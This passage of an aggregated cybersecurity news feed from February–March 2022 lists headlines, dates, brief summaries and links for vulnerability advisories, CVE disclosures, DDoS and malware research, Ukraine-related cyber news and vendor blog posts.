Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Making Site Support a Bit Easier. Meet the Diagnostic Toolbox in Your Cato Socket
2022-03-03T10:23:34Z | 1646303014

One of the more frustrating aspects of more users working from home, and remote connectivity in general, is that troubleshooting often requires user involvement at a really bad time. Users are complaining about connection issues, and just when they’re frustrated, you need them to be patient enough to walk through them the troubleshooting steps needed... The post Making Site Support a Bit Easier. Meet the Diagnostic Toolbox in Your Cato Socket appeared first on Cato Networks.

https://www.catonetworks.com/blog/meet-the-diagnostic-toolbox-in-your-cato-socket/
Küberturvalisuse seadus seab perearstidele uued kohustused
2022-03-03T07:00:00Z | 1646290800

Riigi infosüsteemi amet annab teada, et aasta alguses jõustusid nõuded, mis kohustavad üldarstiabi osutavaid perearste täitma küberturvalisuse seaduse nõudeid. See tähendab, et lisaks varasemale kohustusele kaitsta isikuandmeid peavad tohtrid hindama oma tegevusega seotud küberriske ja omama ülevaadet, kes ja milliseid süsteeme kasutab.

https://ria.ee/uudised/kuberturvalisuse-seadus-seab-perearstidele-uued-kohustused
5 Strategic Projects for Strategic CIOs
2022-03-03T06:52:20Z | 1646290340

The role of the CIO has changed dramatically in the past years. Until now, CIOs had been focusing on ongoing IT management. But today, technology creates new business models and helps achieve business goals. This makes technology the defining pillar of business transformation. CIOs who realize this and identify the right opportunities for strategically leveraging... The post 5 Strategic Projects for Strategic CIOs appeared first on Cato Networks.

https://www.catonetworks.com/blog/5-strategic-projects-for-strategic-cios/
Security Alert (A22-03-02): Multiple Vulnerabilities in Cisco Products
2022-03-03T04:00:00Z | 1646280000

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Powering and Protecting Online Privacy: iCloud Private Relay and Information for Akamai Customers
2022-03-02T14:00:00Z | 1646229600

See how Apple worked with Akamai to launch iCloud Private Relay. Learn about the service and how it can be best leveraged for Akamai customers.

https://www.akamai.com/blog/cloud/powering-and-protecting-online-privacy-icloud-private-relay
Optimizing a smart contract fuzzer
2022-03-02T12:00:33Z | 1646222433

During my winternship, I applied code analysis tools, such as GHC’s Haskell profiler, to improve the efficiency of the Echidna smart contract fuzzer. As a result, Echidna is now over six times faster! Echidna overview To use Echidna, users provide smart contracts and a list of conditions that should be satisfied no […]

https://blog.trailofbits.com/2022/03/02/optimizing-a-smart-contract-fuzzer/
Security Alert (A22-03-01): Multiple Vulnerabilities in Google Chrome
2022-03-02T04:00:00Z | 1646193600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Foram abertos os segundos concursos do Programa Europa Digital, com área de cibersegurança
2022-03-02T00:00:00Z | 1646179200

A Comissão Europeia publicou os segundos concursos para submissão de propostas no âmbito do Programa Europa Digital, onde se apresenta uma área ligada à cibersegurança, mais concretamente “Cybersecurity and Trust”.Os tópicos considerados são os seguintes: European Cyber-shield: Support to cybersecurity in the health sector – DIGITAL-2022-CYBER-02-SUPPORTHEALTH; Support to implementation of relevant EU Legislation: Deploying the Network of National Coordination Centres with Member States – DIGITAL-2022-CYBER-02-NAT-COORDINATION. O período de submissão de propostas termina a 17 de maio de 2022.Para mais detalhe, consulte a seguinte página.

https://dyn.cncs.gov.pt/pt/detalhe/art/135632/foram-abertos-os-segundos-concursos-do-programa-europa-digital-com-area-de-ciberseguranca
Creating a More Diverse Tech Future with the Akamai Foundation
2022-03-01T15:00:00Z | 1646146800

2021, a year of creating a more diverse tech future with The Akamai Foundation.

https://www.akamai.com/blog/culture/akamai-foundation-diverse-tech-future
TCP Middlebox Reflection: Coming to a DDoS Near You
2022-03-01T13:38:00Z | 1646141880

Over the past week, Akamai Security Researchers have detected and analyzed a series of TCP reflection attacks, peaking at 11 Gbps at 1.5 Mpps, that were leveled against Akamai customers. The attack, amplified with a technique called TCP Middlebox Reflection, abuses vulnerable firewalls and content filtering systems to reflect and amplify TCP traffic to a victim machine, creating a powerful DDoS attack.

https://www.akamai.com/blog/security/tcp-middlebox-reflection
The DGA Algorithm Used by Dealply and Bujo Campaigns
2022-03-01T13:28:00Z | 1646141280

During a recent malware hunt[1], the Cato research team identified some unique attributes of DGA algorithms that can help security teams automatically spot malware on their network. The “Shimmy” DGA DGAs (Domain Generator Algorithms) are used by attackers to generate a large number of – you guessed it – domains often used for C&C servers.... The post The DGA Algorithm Used by Dealply and Bujo Campaigns appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-dga-algorithm-used-by-dealply-and-bujo/
Cyber weather in January saw sunny spells and variable cloudiness
2022-03-01T12:02:41Z | 1646136161

The cyber weather in January was mainly dry. We lifted the alerts on the Log4shell vulnerability and FluBot malware. Some clouds appeared because Finnish diplomats were targeted by cyber espionage and the record for the volumetrically largest denial-of-service attack was broken in Finland.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_01/2022
Cyber weather in January saw sunny spells and variable cloudiness
2022-03-01T12:02:41Z | 1646136161

The cyber weather in January was mainly dry. We lifted the alerts on the Log4shell vulnerability and FluBot malware. Some clouds appeared because Finnish diplomats were targeted by cyber espionage and the record for the volumetrically largest denial-of-service attack was broken in Finland.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_01/2022
Total Economic Impact™ of Cato SASE Cloud
2022-03-01T11:26:07Z | 1646133967

The post Total Economic Impact™ of Cato SASE Cloud appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-tei-sase-cato-cloud
NEC and SS8 Conduct Interoperability Verification of 5GC and Lawful Interception Solution
2022-03-01T00:00:02Z | 1646092802

Acceler8 Testing Program Certification Allows for Integration of SS8’s Xcipio in NEC Networks TOKYO, Japan and MILPITAS, Calif. – February 28, 2022 – NEC Corporation (NEC; TSE: 6701) and SS8 Networks (SS8), a leader in Lawful Intercept and Monitoring Center Platforms, today announced they are conducting interoperability testing between NEC’s 5G core and SS8’s lawful […] The post NEC and SS8 Conduct Interoperability Verification of 5GC and Lawful Interception Solution appeared first on SS8.

https://www.ss8.com/nec-and-ss8-conduct-interoperability-verification-of-5gc-and-lawful-interception-solution/
Gerbv RS-274X aperture macro outline primitive out-of-bounds read vulnerability
2022-02-28T00:00:00Z | 1646006400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1413
Gerbv RS-274X aperture macro multiple outline primitives out-of-bounds read vulnerability
2022-02-28T00:00:00Z | 1646006400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1416
Lansweeper WebUserActions.aspx Stored XSS vulnerability
2022-02-28T00:00:00Z | 1646006400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1442
Lansweeper lansweeper EchoAssets.aspx SQL injection vulnerability
2022-02-28T00:00:00Z | 1646006400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1443
MZ Automation GmbH libiec61850 parseNormalModeParameters denial of service vulnerability
2022-02-28T00:00:00Z | 1646006400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1467
Lansweeper lansweeper HelpdeskSetupActions SQL injection vulnerability
2022-02-28T00:00:00Z | 1646006400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1441
Swift Sensors Gateway device password generation authentication bypass vulnerability
2022-02-28T00:00:00Z | 1646006400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1431
Lansweeper lansweeper AssetActions.aspx SQL injection vulnerability
2022-02-28T00:00:00Z | 1646006400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1444
Geopolitical Tensions Increase Risk of DDoS Attacks Among Other Damaging Intrusions
2022-02-25T22:32:00Z | 1645828320

With Ukraine moving beyond the brink of war with an official invasion by Russia underway, organizations both near and afar must brace for potential repercussions in the form of crippling cyberattacks and intrusions. Already Ukraine has been bombarded with DDoS assaults aimed at taking down government sites, communication providers, and financial institutions.

https://www.akamai.com/blog/security/increasing-ddos-attacks-geopolitical-tension
What?s New for Developers: February 2022
2022-02-25T14:00:00Z | 1645797600

A lot has happened since we published our January recap blog. Akamai launched a new documentation site on readme.io, we started a new season of Terraform Tapas, and we saw many amazing contributions from our Developer Champions.

https://www.akamai.com/blog/developers/whats-new-for-developers-february-2022
Operational Readiness and Response to the Ukraine Crisis
2022-02-24T22:00:00Z | 1645740000

Akamai?s security and network teams use our vast view of internet activity to closely monitor and act upon potential cyber threats, and we are taking appropriate measures to review our defensive posture and ensure the integrity of Akamai systems and the Akamai network.

https://www.akamai.com/blog/security/operational-readiness-response-to-ukraine-crisis
Digital attacks in Ukraine: A Timeline
2022-02-24T16:51:00Z | 1645721460

There has been frequent news reporting of digital attacks in Ukraine over the past month. This article provides a chronological overview of the reported cyber attacks and the subsequent publications.

https://english.ncsc.nl/latest/news/2022/maart/10/digital-attacks-in-ukraine-a-timeline
Keep CSIRTs out of the lines of fire
2022-02-24T16:00:00Z | 1645718400

FIRST encourages states to not attack CSIRTs and critical infrastructure

https://www.first.org/blog/20220224_GGE
Keep CSIRTs out of the lines of fire
2022-02-24T16:00:00Z | 1645718400

FIRST encourages states to not attack CSIRTs and critical infrastructure

https://www.first.org/blog/20220224_GGE
Akamai Wins Brandon Hall Award for Best Learning Technology
2022-02-24T14:00:00Z | 1645711200

The Technical Enablement and Education team, part of Akamai?s Global Services organization, has won a coveted Brandon Hall Group silver medal for ?Excellence in Technology,? for their automatic hands-on Lab Validation System (LVS). The automatic LVS is used throughout Global Service training courses, as well as in Channel Partner product certification, to provide real-time evaluations quickly and accurately for hands-on lab training associated with learning how to implement Akamai products.

https://www.akamai.com/blog/news/akamai-wins-brandon-hall-award
Cato Networks Response to UK’s NCSC Guidance On Tightening Cyber Control Due to the Situation in Ukraine
2022-02-24T12:42:26Z | 1645706546

Last week the United Kingdom’s National Cyber Security Centre (NCSC) urged UK organizations “to strengthen their cyber resilience in response to the situation in Ukraine” [1] and today they followed that warning up with a call for “organisations in the UK to bolster their online defences” [2] by adopting a set of “Actions to take... The post Cato Networks Response to UK’s NCSC Guidance On Tightening Cyber Control Due to the Situation in Ukraine appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-response-nscs-guidance-on-tightening-cyber-control-due-to-situation-in-ukraine/
Security Alert (A22-02-11): Multiple Vulnerabilities in Cisco Products
2022-02-24T04:00:00Z | 1645675200

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
New Sandworm malware Cyclops Blink replaces VPNFilter
2022-02-23T15:06:29Z | 1645628789

Joint advisory published by the UK and US identifies a new malware known as Cyclops Blink that could be used to remotely access networks.

https://www.ncsc.gov.uk/news/new-sandworm-malware-cyclops-blink-replaces-vpnfilter
A Definitive Guide to the Remote Procedure Call (RPC) Filter
2022-02-23T14:00:00Z | 1645624800

https://www.akamai.com/blog/security/guide-rpc-filter
Maat: Symbolic execution made easy
2022-02-23T12:00:08Z | 1645617608

We have released Maat, a cross-architecture, multi-purpose, and user-friendly symbolic execution framework. It provides common symbolic execution capabilities such as dynamic symbolic execution (DSE), taint analysis, binary instrumentation, environment simulation, and constraint solving. Maat is easy-to-use, is based on the popular Ghidra intermediate representation (IR) language p-code, prioritizes runtime performance, and has […]

https://blog.trailofbits.com/2022/02/23/maat-symbolic-execution-made-easy/
Exploit Development: ASLR - Coming To A KUSER_SHARED_DATA Structure Near You!
2022-02-23T00:00:00Z | 1645574400

Examining recent changes to a highly-abused static structure, KUSER_SHARED_DATA, and its exploitation impact.

/kuser-shared-data-changes-win-11/
Accusoft ImageGear TIFF YCbCr image parser out-of-bounds write vulnerability
2022-02-23T00:00:00Z | 1645574400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1371
Accusoft ImageGear XWD parser::xwdread_pixmapformat_0_or_1 heap-based buffer overflow vulnerability
2022-02-23T00:00:00Z | 1645574400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1373
Accusoft ImageGear TIFF parser heap-based buffer overflow vulnerabilities
2022-02-23T00:00:00Z | 1645574400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1374
Accusoft ImageGear Palette box parser heap-based buffer overflow vulnerability
2022-02-23T00:00:00Z | 1645574400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1367
Accusoft ImageGear JPEG-JFIF lossless Huffman parser heap-based buffer overflow vulnerabilities
2022-02-23T00:00:00Z | 1645574400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1375
Accusoft ImageGear JPEG-JFIF Scan header parser out-of-bounds write vulnerability
2022-02-23T00:00:00Z | 1645574400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1377
Accusoft ImageGear XWD parser heap-based buffer overflow vulnerability
2022-02-23T00:00:00Z | 1645574400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1368
Accusoft ImageGear DecoderStream::Append heap-based buffer overflow vulnerability
2022-02-23T00:00:00Z | 1645574400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1362
Cybersecurity Nonprofits Form “Nonprofit Cyber” Coalition
2022-02-23T00:00:00Z | 1645574400

Nonprofits that focus on action and tangible results to more effectively collaborate and coordinate to increase efficiency and impact globally

https://www.first.org/newsroom/releases/20220223
Cybersecurity Nonprofits Form “Nonprofit Cyber” Coalition
2022-02-23T00:00:00Z | 1645574400

Nonprofits that focus on action and tangible results to more effectively collaborate and coordinate to increase efficiency and impact globally

https://www.first.org/newsroom/releases/20220223
Pros and Cons of MPLS: Is It Right for Your Network?
2022-02-22T15:08:27Z | 1645542507

MPLS is a reliable routing technique that ensures efficiency and high performance. However, global changes like remote work, mobile connectivity and cloud-based infrastructure require businesses to reconsider their MPLS network strategy. This blog post explains what MPLS is, how it works, MPLS advantages and disadvantages and what to consider next. What is MPLS? MPLS (Multiprotocol... The post Pros and Cons of MPLS: Is It Right for Your Network? appeared first on Cato Networks.

https://www.catonetworks.com/blog/pros-and-cons-of-mpls/
Adding Multi-Factor Authentication to Employee Logins: A Sound Security Principle
2022-02-22T14:00:00Z | 1645538400

The year 2021 was definitely challenging for security practitioners. The number of data breaches continued to rise; a report issued by the Identity Theft Resource Center stated that the total number of breaches in the first three quarters of 2021 exceeded the total number of events in all of 2020 by 17%.

https://www.akamai.com/blog/security/adding-multi-factor-authentication
Finding an unseen SQL Injection by bypassing escape functions in mysqljs/mysql
2022-02-22T00:00:00Z | 1645488000

TL;DR It was found that unexpected behaviors in the query’s escape function could cause a SQL injection in mysqljs/mysql (https://github.com/mysqljs/mysql ), which is one of the most popular MySQL packages in the Node.js ecosystem. Typically, query escape functions or placeholders are known to prevent SQL injections. However, mysqljs/mysql is known to have different escape methods over different value types, and it could eventually cause unexpected behaviors when the attacker passes the parameter with a different value type. Unexpected behaviors include buggy behaviors and SQL injections.

https://flatt.tech/research/posts/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql/
CVE-2022-23922
2022-02-22T00:00:00Z | 1645488000

CWE-276: INCORRECT DEFAULT PERMISSIONS: The affected product is vulnerable to a permissions misconfiguration that may allow an attacker to locally write files to the Program Announcer directory and elevate permissions whenever the program is executed. Successful exploitation of these vulnerabilities could allow an attacker to leverage the misconfigured privileges to the installed directory and achieve code execution in the application's context and permissions.

https://claroty.com/team82/disclosure-dashboard/cve-2022-23922
CVE-2022-23104
2022-02-22T00:00:00Z | 1645488000

CWE-276: INCORRECT DEFAULT PERMISSIONS: The affected product is vulnerable to a permissions misconfiguration that may allow an attacker to locally write files to the program Operator Workspace directory, which holds DLL files and executables. A low-privilege attacker could write a malicious DLL file to the Operator Workspace directory to achieve privilege escalation and the permissions of the user running the program.

https://claroty.com/team82/disclosure-dashboard/cve-2022-23104
Publicado o Regulamento n.º 183/2022, de 21 de fevereiro, em Diário da República
2022-02-21T00:00:00Z | 1645401600

Foi publicado no Diário da República, 2.ª série, o Regulamento n.º 183/2022, de 21 de fevereiro, que configura a instrução técnica relativa à comunicação e informação referentes a pontos de contacto permanente, responsável de segurança, inventário de ativos, relatório anual e notificação de incidentes, como legislação complementar ao Decreto-Lei n.º 65/2021, de 30 de julho, relativamente às referidas obrigações do regime jurídico de segurança do ciberespaço. Para a aprovação deste Regulamento foi realizado um procedimento de consulta pública, cuja decisão final e relatório fundamentado poderão ser consultados aqui.O novo Regulamento encontra-se também disponível para consulta aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135630/publicado-o-regulamento-n-1832022-de-21-de-fevereiro-em-diario-da-republica
Cato Demo Video: Global Backbone
2022-02-20T09:00:22Z | 1645347622

The post Cato Demo Video: Global Backbone appeared first on Cato Networks.

https://www.catonetworks.com/resources/global-backbone-demo/
UK government assess Russian involvement in DDoS attacks on Ukraine
2022-02-19T08:26:19Z | 1645259179

Russia was involved in cyber attacks against Ukraine's financial sector

https://www.ncsc.gov.uk/news/russia-ddos-involvement-in-ukraine
Meet Mike Elissen: Founder of Our Akamai Developer Champions Program
2022-02-18T14:00:00Z | 1645192800

Our longest-standing Developer Advocate, Mike Elissen, noticed an opportunity to make Akamai?s developer relations even stronger. He co-created Developer Champions, an advocacy program that helps Akamai employees better meet customer needs.

https://www.akamai.com/blog/developers/meet-mike-elissen-founder-of-our-akamai-developer-champions-program
Building the Future ? Akamai?s Outlook on the Linode Acquisition
2022-02-17T15:00:00Z | 1645110000

Akamai announced our intent to acquire Linode. The acquisition is intended to create the world?s most distributed compute platform. This new cloud to edge platform will make it easier for developers and businesses to build, run, and secure applications, especially given the complexities of Web3.

https://www.akamai.com/blog/news/building-the-future-akamai-and-linode
1&1 Versatel Expands Its Business Portfolio in Germany with Akamai
2022-02-17T14:00:00Z | 1645106400

1&1 Versatel is a B2B provider for fibre gigabit connections and network-related services in Germany. The company is part of the United Internet AG and as such a sister company of 1&1 AG. 1&1 Versatel operates one of the biggest and most powerful fibre networks in Germany - providing its own network in more than 250 German cities and has implemented over 50,000 business customer solutions. We?re delighted that such an innovative company has chosen to partner with Akamai to increase the reach of its customer base to include smaller enterprises and to make its operations secure.

https://www.akamai.com/blog/news/versatel-expands-portfolio-with-akamai
MKM: Valitsus ajakohastab küberruumi kaitse eesmärgil küberturvalisuse seadust
2022-02-17T07:00:00Z | 1645081200

Valitsus kiitis tänasel istungil heaks küberturvalisuse seaduse, avaliku teabe seaduse ja Eesti Rahvusringhäälingu seaduse muudatused, mille eesmärk on ajakohastada turvanõudeid riigi olulistes infosüsteemides ning korrastada riigi IKT valdkonna turvalisust reguleerivat õigusruumi.

https://ria.ee/uudised/mkm-valitsus-ajakohastab-kuberruumi-kaitse-eesmargil-kuberturvalisuse-seadust
High Threat Security Alert (A22-02-08): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2022-02-17T04:00:00Z | 1645070400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-02-09): Multiple Vulnerabilities in Cisco Products
2022-02-17T04:00:00Z | 1645070400

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-02-10): Multiple Vulnerabilities in Drupal
2022-02-17T04:00:00Z | 1645070400

Drupal has released security advisories to address multiple vulnerabilities in the Drupal products.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai?s Compliance with Cross-border Transfer Laws
2022-02-16T14:00:00Z | 1645020000

Akamai is compliant with applicable data privacy regulations in countries where we and our customers conduct business. This is a fundamental tenet of our company?s core values. After all, when you make life better for billions of people, billions of times a day, there?s an expectation that you will also protect their lives online. And that is exactly what we do.

https://www.akamai.com/blog/security/akamai-data-privacy-compliance
RIA küberturvalisuse aastaraamat: 2021 oli turvanõrkuste aasta
2022-02-16T07:00:00Z | 1644994800

Möödunud aastal tuli päevavalgele mitu kriitilist turvanõrkust, mis põhjustasid paksu pahandust nii Eestis kui ka mujal maailmas. Aeglane reageerimine turvaaukudele võimaldas mitmel juhul Eesti ettevõtteid ja asutusi kerge vaevaga rünnata.

https://ria.ee/uudised/ria-kuberturvalisuse-aastaraamat-2021-oli-turvanorkuste-aasta
Security Alert (A22-02-07): Multiple Vulnerabilities in VMware Products
2022-02-16T04:00:00Z | 1644984000

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
KiCad EDA Gerber Viewer gerber and excellon GCode/Dcode parsing stack-based buffer overflow vulnerability
2022-02-16T00:00:00Z | 1644969600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1460
KiCad EDA Gerber Viewer gerber and excellon coordinates parsing stack-based buffer overflow vulnerability
2022-02-16T00:00:00Z | 1644969600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1453
Total Economic Impact™Study: Cato Delivers 246% ROI and $4.33 Million NPV
2022-02-15T13:50:24Z | 1644933024

Cato Networks was founded with a vision to deliver the next generation of networking and network security through a cloud–native architecture that eliminates the complexity, costs, and risks associated with legacy IT approaches. We aim to rapidly deploy new capabilities and maintain a security posture, without any effort from the IT teams. The question is... The post Total Economic Impact™Study: Cato Delivers 246% ROI and $4.33 Million NPV appeared first on Cato Networks.

https://www.catonetworks.com/blog/tei-study-cato-delivers-246-roi-and-4-million-npv/
High Threat Security Alert (A22-02-06): Multiple Vulnerabilities in Google Chrome
2022-02-15T04:00:00Z | 1644897600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Hancom Office 2020 Hword HwordApp.dll SectorLoc heap-based buffer overflow
2022-02-15T00:00:00Z | 1644883200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1386
Texas Instruments CC3200 SimpleLink Solution HTTP Server /ping.html information disclosure vulnerability
2022-02-15T00:00:00Z | 1644883200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1393
Cato Demo: Controlling Cloud Usage IT with Cato CASB
2022-02-14T15:19:05Z | 1644851945

The post Cato Demo: Controlling Cloud Usage IT with Cato CASB appeared first on Cato Networks.

https://www.catonetworks.com/resources/casb-demo/
Log4j Bringing You Down? Try Infection Monkey?s New Log4Shell Attack Simulation
2022-02-14T14:00:00Z | 1644847200

What if you could see how a real cyberattack might unfold in your network? Imagine the insights you would gain into your security posture if you could safely and easily simulate the behavior of malicious actors before they hit your defenses. That?s what the Infection Monkey does.

https://www.akamai.com/blog/security/infection-monkey-new-log4shell-simulation
Iniciado Roadshow Nacional 2022 nas instalações do CNCS
2022-02-14T00:00:00Z | 1644796800

Teve início o Roadshow Nacional 2022, nas instalações do Centro Nacional de Cibersegurança, onde se verificou uma boa adesão.O Roadshow Nacional 2022 consiste na realização de várias sessões de sensibilização deslocalizadas por todo o País sobre o Regime Jurídico da Segurança do Ciberespaço e respetiva regulamentação referida no Decreto-Lei n.º 65/2021, de 30 de julho.Esta iniciativa tem como principais destinatários a administração pública, os operadores de infraestruturas críticas, os operadores de serviços essenciais e os prestadores de serviços digitais. O seu principal objetivo é capacitar estas entidades quanto às medidas constantes nos diplomas legais, facilitando, esclarecendo e apoiando o seu cumprimento.Este Roadshow Nacional é composto por 76 sessões de sensibilização que serão ministradas presencialmente nas diversas capitais de distrito e ilhas, e têm a duração de 4 horas. Os conteúdos programáticos estão correlacionados com as obrigações das entidades abrangidas pelo Regime Jurídico da Segurança do Ciberespaço, como requisitos de segurança das redes e sistemas de informação e as regras para a notificação de incidentes.Para saber mais, visite a seguinte página.

https://dyn.cncs.gov.pt/pt/detalhe/art/135626/iniciado-roadshow-nacional-2022-nas-instalacoes-do-cncs
CVE-2022-0586
2022-02-14T00:00:00Z | 1644796800

CWE-20: IMPROPER INPUT VALIDATION: Infinite loop in RTMPT protocol dissector in Wireshark 3.6.0 to 3.6.1 and 3.4.0 to 3.4.11 allows denial of service via packet injection or crafted capture file.

https://claroty.com/team82/disclosure-dashboard/cve-2022-0586
CVE-2022-0585
2022-02-14T00:00:00Z | 1644796800

CWE-20: IMPROPER INPUT VALIDATION: Large loops in multiple protocol dissectors in Wireshark 3.6.0 to 3.6.1 and 3.4.0 to 3.4.11 allow denial of service via packet injection or crafted capture file

https://claroty.com/team82/disclosure-dashboard/cve-2022-0585
CVE-2022-0583
2022-02-14T00:00:00Z | 1644796800

CWE-20: IMPROPER INPUT VALIDATION: Crash in the PVFS protocol dissector in Wireshark 3.6.0 to 3.6.1 and 3.4.0 to 3.4.11 allows denial of service via packet injection or crafted capture file.

https://claroty.com/team82/disclosure-dashboard/cve-2022-0583
CVE-2022-0582
2022-02-14T00:00:00Z | 1644796800

CWE-20: IMPROPER INPUT VALIDATION: Unaligned access in the CSN.1 protocol dissector in Wireshark 3.6.0 to 3.6.1 and 3.4.0 to 3.4.11 allows denial of service via packet injection or crafted capture file.

https://claroty.com/team82/disclosure-dashboard/cve-2022-0582
CVE-2021-4190
2022-02-14T00:00:00Z | 1644796800

CWE-20: IMPROPER INPUT VALIDATION: Large loop in the Kafka dissector in Wireshark 3.6.0 allows denial of service via packet injection or crafted capture file.

https://claroty.com/team82/disclosure-dashboard/cve-2021-4190
5 Questions to Ask Your SASE Provider
2022-02-13T11:28:37Z | 1644751717

The post 5 Questions to Ask Your SASE Provider appeared first on Cato Networks.

https://www.catonetworks.com/resources/5-questions-to-ask-your-sase-provider/
Why Cato Uses MITRE ATT&CK (And Why You Should Too)
2022-02-13T09:39:04Z | 1644745144

As Indicators of Compromise (IoC) and reactive security continue to be the focus of many blue teams, the world is catching on to the fact that adversaries are getting smarter by the minute and IoCs are getting harder to find and less effective to monitor, giving adversaries the upper hand and letting them be one... The post Why Cato Uses MITRE ATT&CK (And Why You Should Too) appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-cato-uses-mitre-attck-and-why-you-should-too/
Exceptional Brand Experiences Go Far Beyond the 30-Second Super Bowl Ad
2022-02-11T14:00:00Z | 1644588000

Super Bowl LVI is almost here, and with that comes one of my favorite pastimes: watching the commercials! And you know I?m not alone ? 30% of viewers tune in to the big game primarily to see the commercials, upping the pressure on CMOs to ?get it right.? But winning the hearts and minds of the more than 100 million anticipated viewers goes far beyond creating a captivating 30- or 60-second spot. In fact, the production, supporting digital assets, celebrity endorsements, talking animals, etc. just scratch the surface when it comes to delivering an exceptional brand experience.

https://www.akamai.com/blog/security/power-and-protect-your-brand-during-the-big-game-and-beyond
Why You Shouldn't Tie IP Addresses to Tokens
2022-02-11T14:00:00Z | 1644588000

Locking tokens to the client IP address might seem like a good way to prevent content theft, such as sharing of authenticated URLs that include tokens. It might even appear to work in small-scale test environments. However, the internet has evolved to a point where it?s quite common for clients to use multiple source IP addresses. This is especially true when a token is created by a server on one hostname (such as a CMS) but then validated by a server on another hostname, such as an Akamai edge server, when serving content.

https://www.akamai.com/blog/developers/why-you-shouldn-t-tie-ip-addresses-to-tokens
High Threat Security Alert (A22-02-04): Vulnerability in Apple iOS and iPadOS
2022-02-11T04:00:00Z | 1644552000

Apple has released iOS 15.3.1 and iPadOS 15.3.1 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-02-05): Vulnerability in Microsoft Edge (Chromium-based)
2022-02-11T04:00:00Z | 1644552000

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Moxa MXView Series Web Application information disclosure vulnerability
2022-02-11T00:00:00Z | 1644537600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1403
Moxa MXView Series Web Application authentication bypass vulnerability
2022-02-11T00:00:00Z | 1644537600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1401
Welcome to Akamai TechDocs
2022-02-10T20:40:00Z | 1644525600

We're pleased to announce the launch of Akamai?s brand-new documentation site: techdocs.akamai.com. Powered by ReadMe, our new site offers intuitive and interactive content designed to help you get the most out of your Akamai products.

https://www.akamai.com/blog/developers/welcome-to-akamai-techdocs
An Unprecedented Opportunity to Build Dynamic, Secure Broadband Access for All of the U.S.
2022-02-10T19:00:31Z | 1644519631

All Americans, regardless of background or location, deserve a fast, safe, and reliable digital experience. Whether in Silicon Valley, rural Montana, or an underserved area in Chicago, entrepreneurs, businesses, and consumers should be on an equal footing online. Unfortunately, that is not the current reality, and the pandemic only amplified and exacerbated the existing digital divides we know so well.

https://www.akamai.com/blog/news/dynamic-secure-broadband-access
FritzFrog: P2P Botnet Hops Back on the Scene
2022-02-10T14:00:00Z | 1644501600

FritzFrog is a peer-to-peer botnet, which means its command and control server is not limited to a single, centralized machine, but rather can be done from every machine in its distributed network. In other words, every host running the malware process becomes part of the network, and is capable of sending, receiving, and executing the commands to control machines in the network.

https://www.akamai.com/blog/security-research/fritzfrog-p2p
A New Approach to Blocking Malicious JavaScript
2022-02-09T14:00:00Z | 1644415200

https://www.akamai.com/blog/security/new-approach-blocking-malicious-javaScript
NCSC joins US and Australian partners to reveal latest ransomware trends
2022-02-09T10:51:56Z | 1644403916

Joint advisory warns of an increase in sophisticated, high-impact ransomware incidents against organisations.

https://www.ncsc.gov.uk/news/ncsc-joins-us-and-australian-partners-to-reveal-latest-ransomware-trends
Olukord küberruumis – jaanuar 2022
2022-02-09T07:00:00Z | 1644390000

Jaanuaris registreerisime 205 mõjuga intsidenti, mis on aasta keskmisel tasemel.

https://ria.ee/uudised/olukord-kuberruumis-jaanuar-2022
High Threat Security Alert (A22-02-02): Multiple Vulnerabilities in Microsoft Products (February 2022)
2022-02-09T04:00:00Z | 1644379200

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-02-03): Multiple Vulnerabilities in Firefox
2022-02-09T04:00:00Z | 1644379200

Mozilla has published the advisories (MFSA2022-04 and MFSA2022-05) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
